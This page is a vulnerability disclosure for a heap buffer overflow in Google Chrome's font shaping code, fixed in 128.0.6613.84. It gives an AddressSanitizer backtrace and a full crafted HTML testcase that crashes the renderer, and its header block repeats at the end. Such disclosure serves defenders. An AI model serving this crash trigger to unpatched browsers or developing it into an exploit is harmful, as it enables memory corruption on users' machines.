CVE Details
Google Chrome
August 21, 2024 – Heap buffer overflow in Fonts in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Chromium security severity: High
Credit: Tashita Software Security
Researcher: Javier
Vulnerability Details
Bug
Heap-Buffer-Overflow on Blink Renderer leads to Segmentation Fault: Received signal 11 SEGV_ACCERR 36a0002be000
Backtrace
==2004788==ERROR: AddressSanitizer: use-after-poison on address 0x5030000bc57c at pc 0x55eb46a3039f bp 0x7ffc3285d450 sp 0x7ffc3285d448READ of size 2 at 0x5030000bc57c thread T0 (chrome) #0 0x55eb46a3039e in Consume third_party/blink/renderer/platform/fonts/utf16_text_iterator.h:54:17 #1 0x55eb46a3039e in blink::HarfBuzzShaper::CollectFallbackHintChars(WTF::Deque<blink::ReshapeQueueItem, 0u, WTF::PartitionAllocator> const&, bool, WTF::Vector<int, 16u, WTF::PartitionAllocator>&) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:722:21 #2 0x55eb46a31475 in blink::HarfBuzzShaper::ShapeSegment(blink::RangeContext*, blink::RunSegmenter::RunSegmenterRange const&, blink::ShapeResult*) const third_party/blink/renderer/platform/fonts/shaping/harfbuzz_shaper.cc:887:12Testcase
xxxxxxxxxx<html> <head> <style> ::first-letter { counter-increment : none; } audio { min-width : 111%; } * { float : left; } ::first-line { grid-row-gap : 68%; } #id_3 { font-size-adjust : 45; } #id_4 { container-type : inline-size; } ::before { content : open-quote; } :last-of-type { margin-inline : -97.2296906% 343.788818%; } mark { all : revert; } </style> <script> function trigger() { let var_1 = document.getElementById("id_1"); let var_2 = document.getElementById("id_2"); var_1.replaceWith(var_2); } </script> </head> <body onload="trigger()"> <any_tag> <any_tag></any_tag> </any_tag> <small></small> <canvas id="id_4"></canvas> <any_tag id="id_2"></any_tag> <details></details> <any_tag>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK6apS,q-f! Fqv4rK.Z.NJP p&K+rCV:~trm65&H</any_tag> <any_tag></any_tag> <any_tag> <any_tag id="id_1"></any_tag> </any_tag> <mark>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</mark> <mark>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?A</mark> <any_tag> <any_tag id="id_3">AAAAAAAAAA </any_tag> </any_tag> </body></html>CVE Details
Google Chrome
August 21, 2024 – Heap buffer overflow in Fonts in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
Chromium security severity: High
Credit: Tashita Software Security
Researcher: Javier
Vulnerability Details
Bug
Heap-Buffer-Overflow on Blink Renderer leads to Segmentation Fault: Received signal 11 SEGV_ACCERR 36a0002be000
Backtrace
xxxxxxxxxxTestcase
xxxxxxxxxx